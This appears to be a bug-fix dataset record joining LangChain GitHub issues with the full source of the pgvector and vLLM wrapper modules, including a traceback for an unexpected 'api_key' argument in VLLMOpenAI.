I guess, may be. | https://github.com/langchain-ai/langchain/issues/9696 | https://github.com/langchain-ai/langchain/pull/13232 | 85a77d2c2795b8f0463d809e459c68d4277bd080 | 1726d5dcdd495fa204c2907ce826df81527e0f14 | "2023-08-24T11:57:09Z" | python | "2023-11-15T20:34:37Z" | libs/langchain/langchain/vectorstores/pgvector.py | from __future__ import annotations
import asyncio
import contextlib
import enum
import logging
import uuid
from functools import partial
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Generator,
Iterable,
List,
Optional,
Tuple,
Type,
)
import numpy as np
import sqlalchemy
from sqlalchemy import delete
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import Session
try:
from sqlalchemy.orm import declarative_base
except ImportError:
from sqlalchemy.ext.declarative import declarative_base
from langchain.docstore.document import Document
from langchain.schema.embeddings import Embeddings
from langchain.schema.vectorstore import VectorStore
from langchain.utils import get_from_dict_or_env
from langchain.vectorstores.utils import maximal_marginal_relevance
if TYPE_CHECKING:
from langchain.vectorstores._pgvector_data_models import CollectionStore
class DistanceStrategy(str, enum.Enum):
"""Enumerator of the Distance strategies."""
EUCLIDEAN = "l2"
COSINE = "cosine"
MAX_INNER_PRODUCT = "inner"
DEFAULT_DISTANCE_STRATEGY = DistanceStrategy.COSINE
Base = declarative_base() # type: Any
_LANGCHAIN_DEFAULT_COLLECTION_NAME = "langchain"
class BaseModel(Base):
"""Base model for the SQL stores."""
__abstract__ = True
uuid = sqlalchemy.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
def _results_to_docs(docs_and_scores: Any) -> List[Document]:
"""Return docs from docs and scores."""
return [doc for doc, _ in docs_and_scores]
class PGVector(VectorStore):
"""`Postgres`/`PGVector` vector store.
To use, you should have the ``pgvector`` python package installed.
Args:
connection_string: Postgres connection string.
embedding_function: Any embedding function implementing
`langchain.embeddings.base.Embeddings` interface.
collection_name: The name of the collection to use. (default: langchain)
NOTE: This is not the name of the table, but the name of the collection.
The tables will be created when initializing the store (if not exists)
So, make sure the user has the right permissions to create tables.
distance_strategy: The distance strategy to use. (default: COSINE)
pre_delete_collection: If True, will delete the collection if it exists.
(default: False). Useful for testing.
engine_args: SQLAlchemy's create engine arguments.
Example:
.. code-block:: python
from langchain.vectorstores import PGVector
from langchain.embeddings.openai import OpenAIEmbeddings
CONNECTION_STRING = "postgresql+psycopg2://hwc@localhost:5432/test3"
COLLECTION_NAME = "state_of_the_union_test"
embeddings = OpenAIEmbeddings()
vectorestore = PGVector.from_documents(
embedding=embeddings,
documents=docs,
collection_name=COLLECTION_NAME,
connection_string=CONNECTION_STRING,
)
"""
def __init__(
self,
connection_string: str,
embedding_function: Embeddings,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
collection_metadata: Optional[dict] = None,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
pre_delete_collection: bool = False,
logger: Optional[logging.Logger] = None,
relevance_score_fn: Optional[Callable[[float], float]] = None,
*,
connection: Optional[sqlalchemy.engine.Connection] = None,
engine_args: Optional[dict[str, Any]] = None,
) -> None:
self.connection_string = connection_string
self.embedding_function = embedding_function
self.collection_name = collection_name
self.collection_metadata = collection_metadata
self._distance_strategy = distance_strategy
self.pre_delete_collection = pre_delete_collection
self.logger = logger or logging.getLogger(__name__)
self.override_relevance_score_fn = relevance_score_fn
self.engine_args = engine_args or {}
# Create a connection if not provided, otherwise use the provided connection
self._conn = connection if connection else self.connect()
self.__post_init__()
def __post_init__(
self,
) -> None:
"""Initialize the store."""
self.create_vector_extension()
from langchain.vectorstores._pgvector_data_models import (
CollectionStore,
EmbeddingStore,
)
self.CollectionStore = CollectionStore
self.EmbeddingStore = EmbeddingStore
self.create_tables_if_not_exists()
self.create_collection()
@property
def embeddings(self) -> Embeddings:
return self.embedding_function
def connect(self) -> sqlalchemy.engine.Connection:
engine = sqlalchemy.create_engine(self.connection_string, **self.engine_args)
conn = engine.connect()
return conn
def create_vector_extension(self) -> None:
try:
with Session(self._conn) as session:
# The advisor lock fixes issue arising from concurrent
# creation of the vector extension.
# https://github.com/langchain-ai/langchain/issues/12933
# For more information see:
# https://www.postgresql.org/docs/16/explicit-locking.html#ADVISORY-LOCKS
statement = sqlalchemy.text(
"BEGIN;"
"SELECT pg_advisory_xact_lock(1573678846307946496);"
"CREATE EXTENSION IF NOT EXISTS vector;"
"COMMIT;"
)
session.execute(statement)
session.commit()
except Exception as e:
raise Exception(f"Failed to create vector extension: {e}") from e
def create_tables_if_not_exists(self) -> None:
with self._conn.begin():
Base.metadata.create_all(self._conn)
def drop_tables(self) -> None:
with self._conn.begin():
Base.metadata.drop_all(self._conn)
def create_collection(self) -> None:
if self.pre_delete_collection:
self.delete_collection()
with Session(self._conn) as session:
self.CollectionStore.get_or_create(
session, self.collection_name, cmetadata=self.collection_metadata
)
def delete_collection(self) -> None:
self.logger.debug("Trying to delete collection")
with Session(self._conn) as session:
collection = self.get_collection(session)
if not collection:
self.logger.warning("Collection not found")
return
session.delete(collection)
session.commit()
@contextlib.contextmanager
def _make_session(self) -> Generator[Session, None, None]:
"""Create a context manager for the session, bind to _conn string."""
yield Session(self._conn)
def delete(
self,
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> None:
"""Delete vectors by ids or uuids.
Args:
ids: List of ids to delete.
"""
with Session(self._conn) as session:
if ids is not None:
self.logger.debug(
"Trying to delete vectors by ids (represented by the model "
"using the custom ids field)"
)
stmt = delete(self.EmbeddingStore).where(
self.EmbeddingStore.custom_id.in_(ids)
)
session.execute(stmt)
session.commit()
def get_collection(self, session: Session) -> Optional["CollectionStore"]:
return self.CollectionStore.get_by_name(session, self.collection_name)
@classmethod
def __from(
cls,
texts: List[str],
embeddings: List[List[float]],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
connection_string: Optional[str] = None,
pre_delete_collection: bool = False,
**kwargs: Any,
) -> PGVector:
if ids is None:
ids = [str(uuid.uuid1()) for _ in texts]
if not metadatas:
metadatas = [{} for _ in texts]
if connection_string is None:
connection_string = cls.get_connection_string(kwargs)
store = cls(
connection_string=connection_string,
collection_name=collection_name,
embedding_function=embedding,
distance_strategy=distance_strategy,
pre_delete_collection=pre_delete_collection,
**kwargs,
)
store.add_embeddings(
texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs
)
return store
def add_embeddings(
self,
texts: Iterable[str],
embeddings: List[List[float]],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> List[str]:
"""Add embeddings to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
embeddings: List of list of embedding vectors.
metadatas: List of metadatas associated with the texts.
kwargs: vectorstore specific parameters
"""
if ids is None:
ids = [str(uuid.uuid1()) for _ in texts]
if not metadatas:
metadatas = [{} for _ in texts]
with Session(self._conn) as session:
collection = self.get_collection(session)
if not collection:
raise ValueError("Collection not found")
for text, metadata, embedding, id in zip(texts, metadatas, embeddings, ids):
embedding_store = self.EmbeddingStore(
embedding=embedding,
document=text,
cmetadata=metadata,
custom_id=id,
collection_id=collection.uuid,
)
session.add(embedding_store)
session.commit()
return ids
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
kwargs: vectorstore specific parameters
Returns:
List of ids from adding the texts into the vectorstore.
"""
embeddings = self.embedding_function.embed_documents(list(texts))
return self.add_embeddings(
texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs
)
def similarity_search(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
**kwargs: Any,
) -> List[Document]:
"""Run similarity search with PGVector with distance.
Args:
query (str): Query text to search for.
k (int): Number of results to return. Defaults to 4.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List of Documents most similar to the query.
"""
embedding = self.embedding_function.embed_query(text=query)
return self.similarity_search_by_vector(
embedding=embedding,
k=k,
filter=filter,
)
def similarity_search_with_score(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
) -> List[Tuple[Document, float]]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List of Documents most similar to the query and score for each.
"""
embedding = self.embedding_function.embed_query(query)
docs = self.similarity_search_with_score_by_vector(
embedding=embedding, k=k, filter=filter
)
return docs
@property
def distance_strategy(self) -> Any:
if self._distance_strategy == DistanceStrategy.EUCLIDEAN:
return self.EmbeddingStore.embedding.l2_distance
elif self._distance_strategy == DistanceStrategy.COSINE:
return self.EmbeddingStore.embedding.cosine_distance
elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT:
return self.EmbeddingStore.embedding.max_inner_product
else:
raise ValueError(
f"Got unexpected value for distance: {self._distance_strategy}. "
f"Should be one of {', '.join([ds.value for ds in DistanceStrategy])}."
)
def similarity_search_with_score_by_vector(
self,
embedding: List[float],
k: int = 4,
filter: Optional[dict] = None,
) -> List[Tuple[Document, float]]:
results = self.__query_collection(embedding=embedding, k=k, filter=filter)
return self._results_to_docs_and_scores(results)
def _results_to_docs_and_scores(self, results: Any) -> List[Tuple[Document, float]]:
"""Return docs and scores from results."""
docs = [
(
Document(
page_content=result.EmbeddingStore.document,
metadata=result.EmbeddingStore.cmetadata,
),
result.distance if self.embedding_function is not None else None,
)
for result in results
]
return docs
def __query_collection(
self,
embedding: List[float],
k: int = 4,
filter: Optional[Dict[str, str]] = None,
) -> List[Any]:
"""Query the collection."""
with Session(self._conn) as session:
collection = self.get_collection(session)
if not collection:
raise ValueError("Collection not found")
filter_by = self.EmbeddingStore.collection_id == collection.uuid
if filter is not None:
filter_clauses = []
for key, value in filter.items():
IN = "in"
if isinstance(value, dict) and IN in map(str.lower, value):
value_case_insensitive = {
k.lower(): v for k, v in value.items()
}
filter_by_metadata = self.EmbeddingStore.cmetadata[
key
].astext.in_(value_case_insensitive[IN])
filter_clauses.append(filter_by_metadata)
else:
filter_by_metadata = self.EmbeddingStore.cmetadata[
key
].astext == str(value)
filter_clauses.append(filter_by_metadata)
filter_by = sqlalchemy.and_(filter_by, *filter_clauses)
_type = self.EmbeddingStore
results: List[Any] = (
session.query(
self.EmbeddingStore,
self.distance_strategy(embedding).label("distance"), # type: ignore
)
.filter(filter_by)
.order_by(sqlalchemy.asc("distance"))
.join(
self.CollectionStore,
self.EmbeddingStore.collection_id == self.CollectionStore.uuid,
)
.limit(k)
.all()
)
return results
def similarity_search_by_vector(
self,
embedding: List[float],
k: int = 4,
filter: Optional[dict] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs most similar to embedding vector.
Args:
embedding: Embedding to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List of Documents most similar to the query vector.
"""
docs_and_scores = self.similarity_search_with_score_by_vector(
embedding=embedding, k=k, filter=filter
)
return _results_to_docs(docs_and_scores)
@classmethod
def from_texts(
cls: Type[PGVector],
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
ids: Optional[List[str]] = None,
pre_delete_collection: bool = False,
**kwargs: Any,
) -> PGVector:
"""
Return VectorStore initialized from texts and embeddings.
Postgres connection string is required
"Either pass it as a parameter
or set the PGVECTOR_CONNECTION_STRING environment variable.
"""
embeddings = embedding.embed_documents(list(texts))
return cls.__from(
texts,
embeddings,
embedding,
metadatas=metadatas,
ids=ids,
collection_name=collection_name,
distance_strategy=distance_strategy,
pre_delete_collection=pre_delete_collection,
**kwargs,
)
@classmethod
def from_embeddings(
cls,
text_embeddings: List[Tuple[str, List[float]]],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
ids: Optional[List[str]] = None,
pre_delete_collection: bool = False,
**kwargs: Any,
) -> PGVector:
"""Construct PGVector wrapper from raw documents and pre-
generated embeddings.
Return VectorStore initialized from documents and embeddings.
Postgres connection string is required
"Either pass it as a parameter
or set the PGVECTOR_CONNECTION_STRING environment variable.
Example:
.. code-block:: python
from langchain.vectorstores import PGVector
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
text_embeddings = embeddings.embed_documents(texts)
text_embedding_pairs = list(zip(texts, text_embeddings))
faiss = PGVector.from_embeddings(text_embedding_pairs, embeddings)
"""
texts = [t[0] for t in text_embeddings]
embeddings = [t[1] for t in text_embeddings]
return cls.__from(
texts,
embeddings,
embedding,
metadatas=metadatas,
ids=ids,
collection_name=collection_name,
distance_strategy=distance_strategy,
pre_delete_collection=pre_delete_collection,
**kwargs,
)
@classmethod
def from_existing_index(
cls: Type[PGVector],
embedding: Embeddings,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
pre_delete_collection: bool = False,
**kwargs: Any,
) -> PGVector:
"""
Get instance of an existing PGVector store.This method will
return the instance of the store without inserting any new
embeddings
"""
connection_string = cls.get_connection_string(kwargs)
store = cls(
connection_string=connection_string,
collection_name=collection_name,
embedding_function=embedding,
distance_strategy=distance_strategy,
pre_delete_collection=pre_delete_collection,
)
return store
@classmethod
def get_connection_string(cls, kwargs: Dict[str, Any]) -> str:
connection_string: str = get_from_dict_or_env(
data=kwargs,
key="connection_string",
env_key="PGVECTOR_CONNECTION_STRING",
)
if not connection_string:
raise ValueError(
"Postgres connection string is required"
"Either pass it as a parameter"
"or set the PGVECTOR_CONNECTION_STRING environment variable."
)
return connection_string
@classmethod
def from_documents(
cls: Type[PGVector],
documents: List[Document],
embedding: Embeddings,
collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME,
distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY,
ids: Optional[List[str]] = None,
pre_delete_collection: bool = False,
**kwargs: Any,
) -> PGVector:
"""
Return VectorStore initialized from documents and embeddings.
Postgres connection string is required
"Either pass it as a parameter
or set the PGVECTOR_CONNECTION_STRING environment variable.
"""
texts = [d.page_content for d in documents]
metadatas = [d.metadata for d in documents]
connection_string = cls.get_connection_string(kwargs)
kwargs["connection_string"] = connection_string
return cls.from_texts(
texts=texts,
pre_delete_collection=pre_delete_collection,
embedding=embedding,
distance_strategy=distance_strategy,
metadatas=metadatas,
ids=ids,
collection_name=collection_name,
**kwargs,
)
@classmethod
def connection_string_from_db_params(
cls,
driver: str,
host: str,
port: int,
database: str,
user: str,
password: str,
) -> str:
"""Return connection string from database parameters."""
return f"postgresql+{driver}://{user}:{password}@{host}:{port}/{database}"
def _select_relevance_score_fn(self) -> Callable[[float], float]:
"""
The 'correct' relevance function
may differ depending on a few things, including:
- the distance / similarity metric used by the VectorStore
- the scale of your embeddings (OpenAI's are unit normed. Many others are not!)
- embedding dimensionality
- etc.
"""
if self.override_relevance_score_fn is not None:
return self.override_relevance_score_fn
# Default strategy is to rely on distance strategy provided
# in vectorstore constructor
if self._distance_strategy == DistanceStrategy.COSINE:
return self._cosine_relevance_score_fn
elif self._distance_strategy == DistanceStrategy.EUCLIDEAN:
return self._euclidean_relevance_score_fn
elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT:
return self._max_inner_product_relevance_score_fn
else:
raise ValueError(
"No supported normalization function"
f" for distance_strategy of {self._distance_strategy}."
"Consider providing relevance_score_fn to PGVector constructor."
)
def max_marginal_relevance_search_with_score_by_vector(
self,
embedding: List[float],
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Tuple[Document, float]]:
"""Return docs selected using the maximal marginal relevance with score
to embedding vector.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
embedding: Embedding to look up documents similar to.
k (int): Number of Documents to return. Defaults to 4.
fetch_k (int): Number of Documents to fetch to pass to MMR algorithm.
Defaults to 20.
lambda_mult (float): Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List[Tuple[Document, float]]: List of Documents selected by maximal marginal
relevance to the query and score for each.
"""
results = self.__query_collection(embedding=embedding, k=fetch_k, filter=filter)
embedding_list = [result.EmbeddingStore.embedding for result in results]
mmr_selected = maximal_marginal_relevance(
np.array(embedding, dtype=np.float32),
embedding_list,
k=k,
lambda_mult=lambda_mult,
)
candidates = self._results_to_docs_and_scores(results)
return [r for i, r in enumerate(candidates) if i in mmr_selected]
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query (str): Text to look up documents similar to.
k (int): Number of Documents to return. Defaults to 4.
fetch_k (int): Number of Documents to fetch to pass to MMR algorithm.
Defaults to 20.
lambda_mult (float): Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List[Document]: List of Documents selected by maximal marginal relevance.
"""
embedding = self.embedding_function.embed_query(query)
return self.max_marginal_relevance_search_by_vector(
embedding,
k=k,
fetch_k=fetch_k,
lambda_mult=lambda_mult,
filter=filter,
**kwargs,
)
def max_marginal_relevance_search_with_score(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[dict] = None,
**kwargs: Any,
) -> List[Tuple[Document, float]]:
"""Return docs selected using the maximal marginal relevance with score.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query (str): Text to look up documents similar to.
k (int): Number of Documents to return. Defaults to 4.
fetch_k (int): Number of Documents to fetch to pass to MMR algorithm.
Defaults to 20.
lambda_mult (float): Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List[Tuple[Document, float]]: List of Documents selected by maximal marginal
relevance to the query and score for each.
"""
embedding = self.embedding_function.embed_query(query)
docs = self.max_marginal_relevance_search_with_score_by_vector(
embedding=embedding,
k=k,
fetch_k=fetch_k,
lambda_mult=lambda_mult,
filter=filter,
**kwargs,
)
return docs
def max_marginal_relevance_search_by_vector(
self,
embedding: List[float],
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance
to embedding vector.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
embedding (str): Text to look up documents similar to.
k (int): Number of Documents to return. Defaults to 4.
fetch_k (int): Number of Documents to fetch to pass to MMR algorithm.
Defaults to 20.
lambda_mult (float): Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List[Document]: List of Documents selected by maximal marginal relevance.
"""
docs_and_scores = self.max_marginal_relevance_search_with_score_by_vector(
embedding,
k=k,
fetch_k=fetch_k,
lambda_mult=lambda_mult,
filter=filter,
**kwargs,
)
return _results_to_docs(docs_and_scores)
async def amax_marginal_relevance_search_by_vector(
self,
embedding: List[float],
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance."""
# This is a temporary workaround to make the similarity search
# asynchronous. The proper solution is to make the similarity search
# asynchronous in the vector store implementations.
func = partial(
self.max_marginal_relevance_search_by_vector,
embedding,
k=k,
fetch_k=fetch_k,
lambda_mult=lambda_mult,
filter=filter,
**kwargs,
)
return await asyncio.get_event_loop().run_in_executor(None, func)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 13,507 | VLLMOpenAI -- create() got an unexpected keyword argument 'api_key' | ### System Info
Python 3.9
langchain 0.0.336
openai 1.3.2
pandas 2.1.3
### Who can help?
@EYU
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
First of all, thank you for this great library !
Concerning the bug, I have a vllm openai server (0.2.1.post1) running locally started with the following command:
```
python -m vllm.entrypoints.openai.api_server --model ./zephyr-7b-beta --served-model-name zephyr-7b-beta
```
On the client side, I have this piece of code, slightly adapted from the documentation (only the model name changes).
```python
from langchain.llms import VLLMOpenAI
llm = VLLMOpenAI(
openai_api_key="EMPTY",
openai_api_base="http://localhost:8000/v1",
model_name="zephyr-7b-beta",
)
print(llm("Rome is"))
```
And I got the following error:
```text
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[19], line 6
1 llm = VLLMOpenAI(
2 openai_api_key="EMPTY",
3 openai_api_base="http://localhost:8000/v1",
4 model_name="zephyr-7b-beta",
5 )
----> 6 llm("Rome is")
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:876, in BaseLLM.__call__(self, prompt, stop, callbacks, tags, metadata, **kwargs)
869 if not isinstance(prompt, str):
870 raise ValueError(
871 "Argument `prompt` is expected to be a string. Instead found "
872 f"{type(prompt)}. If you want to run the LLM on multiple prompts, use "
873 "`generate` instead."
874 )
875 return (
--> 876 self.generate(
877 [prompt],
878 stop=stop,
879 callbacks=callbacks,
880 tags=tags,
881 metadata=metadata,
882 **kwargs,
883 )
884 .generations[0][0]
885 .text
886 )
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:656, in BaseLLM.generate(self, prompts, stop, callbacks, tags, metadata, run_name, **kwargs)
641 raise ValueError(
642 "Asked to cache, but no cache found at `langchain.cache`."
643 )
644 run_managers = [
645 callback_manager.on_llm_start(
646 dumpd(self),
(...)
654 )
655 ]
--> 656 output = self._generate_helper(
657 prompts, stop, run_managers, bool(new_arg_supported), **kwargs
658 )
659 return output
660 if len(missing_prompts) > 0:
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:544, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs)
542 for run_manager in run_managers:
543 run_manager.on_llm_error(e)
--> 544 raise e
545 flattened_outputs = output.flatten()
546 for manager, flattened_output in zip(run_managers, flattened_outputs):
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:531, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs)
521 def _generate_helper(
522 self,
523 prompts: List[str],
(...)
527 **kwargs: Any,
528 ) -> LLMResult:
529 try:
530 output = (
--> 531 self._generate(
532 prompts,
533 stop=stop,
534 # TODO: support multiple run managers
535 run_manager=run_managers[0] if run_managers else None,
536 **kwargs,
537 )
538 if new_arg_supported
539 else self._generate(prompts, stop=stop)
540 )
541 except BaseException as e:
542 for run_manager in run_managers:
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:454, in BaseOpenAI._generate(self, prompts, stop, run_manager, **kwargs)
442 choices.append(
443 {
444 "text": generation.text,
(...)
451 }
452 )
453 else:
--> 454 response = completion_with_retry(
455 self, prompt=_prompts, run_manager=run_manager, **params
456 )
457 if not isinstance(response, dict):
458 # V1 client returns the response in an PyDantic object instead of
459 # dict. For the transition period, we deep convert it to dict.
460 response = response.dict()
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:114, in completion_with_retry(llm, run_manager, **kwargs)
112 """Use tenacity to retry the completion call."""
113 if is_openai_v1():
--> 114 return llm.client.create(**kwargs)
116 retry_decorator = _create_retry_decorator(llm, run_manager=run_manager)
118 @retry_decorator
119 def _completion_with_retry(**kwargs: Any) -> Any:
File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/openai/_utils/_utils.py:299, in required_args.<locals>.inner.<locals>.wrapper(*args, **kwargs)
297 msg = f"Missing required argument: {quote(missing[0])}"
298 raise TypeError(msg)
--> 299 return func(*args, **kwargs)
TypeError: create() got an unexpected keyword argument 'api_key'
```
It seems that if I remove the line 158 from `langchain/llms/vllm.py`, the code is working.
### Expected behavior
I expect a completion with no error. | https://github.com/langchain-ai/langchain/issues/13507 | https://github.com/langchain-ai/langchain/pull/13517 | 6bc08266e0c9ca7841bb322259e69a9c0dd6a08d | 69d39e2173fcb44cdcd334cb912acaf7b148dff6 | "2023-11-17T08:56:07Z" | python | "2023-11-20T01:49:55Z" | libs/langchain/langchain/llms/vllm.py | from typing import Any, Dict, List, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import BaseLLM
from langchain.llms.openai import BaseOpenAI
from langchain.pydantic_v1 import Field, root_validator
from langchain.schema.output import Generation, LLMResult
class VLLM(BaseLLM):
"""VLLM language model."""
model: str = ""
"""The name or path of a HuggingFace Transformers model."""
tensor_parallel_size: Optional[int] = 1
"""The number of GPUs to use for distributed execution with tensor parallelism."""
trust_remote_code: Optional[bool] = False
"""Trust remote code (e.g., from HuggingFace) when downloading the model
and tokenizer."""
n: int = 1
"""Number of output sequences to return for the given prompt."""
best_of: Optional[int] = None
"""Number of output sequences that are generated from the prompt."""
presence_penalty: float = 0.0
"""Float that penalizes new tokens based on whether they appear in the
generated text so far"""
frequency_penalty: float = 0.0
"""Float that penalizes new tokens based on their frequency in the
generated text so far"""
temperature: float = 1.0
"""Float that controls the randomness of the sampling."""
top_p: float = 1.0
"""Float that controls the cumulative probability of the top tokens to consider."""
top_k: int = -1
"""Integer that controls the number of top tokens to consider."""
use_beam_search: bool = False
"""Whether to use beam search instead of sampling."""
stop: Optional[List[str]] = None
"""List of strings that stop the generation when they are generated."""
ignore_eos: bool = False
"""Whether to ignore the EOS token and continue generating tokens after
the EOS token is generated."""
max_new_tokens: int = 512
"""Maximum number of tokens to generate per output sequence."""
logprobs: Optional[int] = None
"""Number of log probabilities to return per output token."""
dtype: str = "auto"
"""The data type for the model weights and activations."""
download_dir: Optional[str] = None
"""Directory to download and load the weights. (Default to the default
cache dir of huggingface)"""
vllm_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `vllm.LLM` call not explicitly specified."""
client: Any #: :meta private:
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that python package exists in environment."""
try:
from vllm import LLM as VLLModel
except ImportError:
raise ImportError(
"Could not import vllm python package. "
"Please install it with `pip install vllm`."
)
values["client"] = VLLModel(
model=values["model"],
tensor_parallel_size=values["tensor_parallel_size"],
trust_remote_code=values["trust_remote_code"],
dtype=values["dtype"],
download_dir=values["download_dir"],
**values["vllm_kwargs"],
)
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling vllm."""
return {
"n": self.n,
"best_of": self.best_of,
"max_tokens": self.max_new_tokens,
"top_k": self.top_k,
"top_p": self.top_p,
"temperature": self.temperature,
"presence_penalty": self.presence_penalty,
"frequency_penalty": self.frequency_penalty,
"stop": self.stop,
"ignore_eos": self.ignore_eos,
"use_beam_search": self.use_beam_search,
"logprobs": self.logprobs,
}
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Run the LLM on the given prompt and input."""
from vllm import SamplingParams
# build sampling parameters
params = {**self._default_params, **kwargs, "stop": stop}
sampling_params = SamplingParams(**params)
# call the model
outputs = self.client.generate(prompts, sampling_params)
generations = []
for output in outputs:
text = output.outputs[0].text
generations.append([Generation(text=text)])
return LLMResult(generations=generations)
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "vllm"
class VLLMOpenAI(BaseOpenAI):
"""vLLM OpenAI-compatible API client"""
@property
def _invocation_params(self) -> Dict[str, Any]:
"""Get the parameters used to invoke the model."""
openai_creds: Dict[str, Any] = {
"api_key": self.openai_api_key,
"api_base": self.openai_api_base,
}
return {
"model": self.model_name,
**openai_creds,
**self._default_params,
"logit_bias": None,
}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "vllm-openai"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 13,539 | New update broke embeddings models | ### System Info
LangChain version: 0.0.337
Python version: 3.10.13
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
